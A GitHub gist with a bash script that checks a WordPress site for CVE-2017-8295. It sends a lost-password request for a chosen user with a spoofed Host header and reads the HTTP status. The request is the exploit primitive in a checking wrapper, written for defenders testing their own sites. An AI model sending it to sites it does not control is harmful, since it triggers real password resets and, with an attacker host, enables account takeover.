Skip to content

Instantly share code, notes, and snippets.

@stevegrunwell
Last active February 26, 2018 04:35
Show Gist options
  • Save stevegrunwell/4a8f1990972b3570b3e423533b318aac to your computer and use it in GitHub Desktop.
Save stevegrunwell/4a8f1990972b3570b3e423533b318aac to your computer and use it in GitHub Desktop.
#!/usr/bin/env bash
#
# Check a WordPress domain against CVE-2017-8295.
# https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
#
# Usage:
# ./wordpress-host-check <domain> <username>
#
# <domain>
# The WordPress domain you wish to check. For example, http://example.com.
#
# <username>
# The WordPress username you wish to attempt a password reset for.
#
# Author: Steve Grunwell (https://stevegrunwell.com)
# Link: https://stevegrunwell.com/blog/keeping-wordpress-secure/
# License: MIT
echo -e "\nAttempting to reset the password for '$2' on $1:";
RESPONSE=$(curl --write-out %{http_code} --silent --output /dev/null \
-X POST "$1/wp-login.php?action=lostpassword" \
-H 'cache-control: no-cache' \
-H 'content-type: application/x-www-form-urlencoded' \
-H 'host: example.com' \
-H "origin: $1" \
-H "referer: $1/wp-login.php?action=lostpassword" \
-d user_login=$2)
# A 302 response indicates the user was redirected to the confirmation screen.
if [ "$RESPONSE" == "302" ]; then
echo -e "> Uh oh, it appears that $1 may be vulnerable!\n"
else
echo -e "> Good news! $1 appears to be safe from this exploit.\n"
fi
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment